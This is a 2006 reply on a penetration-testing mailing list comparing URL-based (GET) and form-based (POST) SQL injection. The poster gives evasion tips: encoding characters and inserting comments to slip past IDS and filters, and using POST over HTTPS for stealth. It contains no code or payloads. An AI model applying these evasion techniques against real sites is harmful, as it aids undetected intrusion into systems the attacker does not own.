RE: sql injection: url or form based?

["LAROUCHE Francois" <Francois.LAROUCHE () consulting-for accor com>]

Hi Johnny,

I think you've got the essential of the differences with the previous answers.

But one was missing: the limit of the size of the GET. (about 2083 for IE if I recall well). Some URL by themselves can 
be REALLY long without any SQL injection and if you find a UNION injection and it needs let's say 60 values AND you 
need to encode each character + add comments between words to evade IDS, reverse proxies, or filters then you can go 
easily beyond the limit of the URL for the given web server. Or when you want to create a new function or stored 
procedure on the attacked sql server, you need space as well. 

Don't laugh. It happened to me a couple of times...

POST has no limit.

Personally, I prefer POST. Especially over HTTPS, it's a nice way to be really stealthy :) And besides, programmers are 
much more lazy when it comes to check values from hidden or select HTML tags, they think since it's "hidden" it cannot 
be tampered with.

Cheers!

François Larouche

-----Original Message-----
From: johnny Mnemonic [mailto:security4thefainthearted () hotmail com] 
Sent: Friday, February 10, 2006 7:07 AM
To: pen-test () securityfocus com
Subject: sql injection: url or form based? 

I see many references to manipulation of SQL backend databases through both URL based and Forms based SQL injection but 
I'm wondering what are the 
essentials differences between both methods and when to use one over the 
other.
Thanks.

_________________________________________________________________
Get cheap fares online with MSN Travel http://www.msn.com.sg/travel/


------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: 

Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are 
launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are 
futile against web application hacking. Check your website for vulnerabilities 
to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at:

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------



This e-mail, any attachments and the information contained therein ("this message") are confidential and intended 
solely for the use of the addressee(s). If you have received this message in error please send it back to the sender 
and delete it. Unauthorized publication, use, dissemination or disclosure of this message, either in whole or in part 
is strictly prohibited.
********************************************************************** 
Ce message électronique et tous les fichiers joints ainsi que  les informations contenues dans ce message ( ci après 
"le message" ), sont confidentiels et destinés exclusivement à l'usage de la  personne à laquelle ils sont adressés. Si 
vous avez reçu ce message par erreur, merci  de le renvoyer à son émetteur et de le détruire. Toutes diffusion, 
publication, totale ou partielle ou divulgation sous quelque forme que se soit non expressément autorisées de ce 
message, sont interdites.
********************************************************************** 


------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner:

Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
futile against web application hacking. Check your website for vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers do!
Download Trial at:

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------